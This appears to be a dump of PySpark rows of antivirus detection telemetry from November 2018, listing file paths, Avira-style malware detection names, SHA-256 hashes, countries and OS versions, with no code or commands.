  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072629-2c7558e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cc137896\\AVSCAN-20181102-072350-1DB22583\\AVSCAN-20181102-072629-2C7558E7', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='4760b409daca9e0d5936e8b51c98c7ec7e0ec2d22203f5ce117ae8716a7f3d5e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:26:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.402345.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:42:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='24e578da3af8c149fdcb96bf7509f8852ef73c0007d985e25d9ad2cdf87db090', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\24E578DA3AF8C149FDCB96BF7509F8852EF73C0007D985E25D9AD2CDF87DB090', filesize=1856000, name='HEUR/AGEN.1031594.#M1.#R1'), hash='24e578da3af8c149fdcb96bf7509f8852ef73c0007d985e25d9ad2cdf87db090', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='decorating - de.scr', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Templates\\Interior Decorating - DE\\Decorating - DE.scr', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131039-0bd4b429', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b3d4093\\AVSCAN-20181102-131004-062DAE07\\AVSCAN-20181102-131039-0BD4B429', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:10:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053207-9bdc9cc4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053207-9BDC9CC4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050710-1f589e42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050710-1F589E42', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140602-f5b53729', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-140602-F5B53729', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:09:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204734-f61528de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b74552d\\AVSCAN-20181102-204439-D7908571\\AVSCAN-20181102-204734-F61528DE', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='4d5550b6882d918bde0c398d782e222dc87f01cadb9c8bc57fbd54b46074b7cb', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:47:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052001-eade48b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052001-EADE48B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hnwskaiv.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\HNwSKAIv.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052209-376f5a26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052209-376F5A26', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051701-7fa8d9ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051701-7FA8D9EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hl.exe', filepath='c:\\counter-strike global offensive 1.0\\hl.exe', filesize=5888000, name='SPR/GameHack.6980e9.#M1.#R1'), hash='6980e96106136eb42b4248e91bea4f08b08c5ec3a21151e9513d02edf45a74ae', metadata=Row(cmdline='-game cstrike -console', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Pictures\\cs_global_offensive.exe', parentsize=447149694, timestamp='2018-11-02T19:10:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055652-11098778', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055652-11098778', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061414-7e409dce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061414-7E409DCE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050719-251ac14a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050719-251AC14A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='62d7835ba92d38b165a02f6b16f881f7be7c6931fbda01a4ff38506bf7421a96', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053238-ae035bd8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053238-AE035BD8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133857-c7d0b49b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133857-C7D0B49B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.231\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.231\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:09:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='701926fd93e9c2d0aab4db525a57077a873abcbe63511ed7990078de635703fb.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\701926FD93E9C2D0AAB4DB525A57077A873ABCBE63511ED7990078DE635703FB.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='701926fd93e9c2d0aab4db525a57077a873abcbe63511ed7990078de635703fb', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:44:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052814-11129ab0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052814-11129AB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054221-09fc5614', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054221-09FC5614', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055836-4ee55125', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055836-4EE55125', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061321-5e69d47b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061321-5E69D47B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050738-3079e1ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050738-3079E1FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa2472.46148\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa2472.46148\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:07:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061817-0f10d9e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061817-0F10D9E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061728-f1a95386', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061728-F1A95386', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061755-01eeb16a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061755-01EEB16A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055504-d0dccffe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055504-D0DCCFFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051528-485ed42f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051528-485ED42F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061322-5f4baac0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061322-5F4BAAC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061158-2caef183', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061158-2CAEF183', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054627-9c47a998', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054627-9C47A998', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055604-f42f87bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055604-F42F87BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052329-67366c4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052329-67366C4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050857-5f5434f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050857-5F5434F9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050420-ba463a7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050420-BA463A7A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052422-86aaac4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052422-86AAAC4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052155-2f175d38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052155-2F175D38', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055015-247b23d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055015-247B23D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054751-ceb2e240', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054751-CEB2E240', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060042-9a3a96b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060042-9A3A96B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055023-294a2924', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055023-294A2924', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052903-2e104daf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052903-2E104DAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060444-29ffffac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060444-29FFFFAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050921-6dce65a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050921-6DCE65A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062526-0e7f0b52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062526-0E7F0B52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054022-c2c2ca54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054022-C2C2CA54', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:21Z'), dt=datetime.date(2018, 11, 2)),
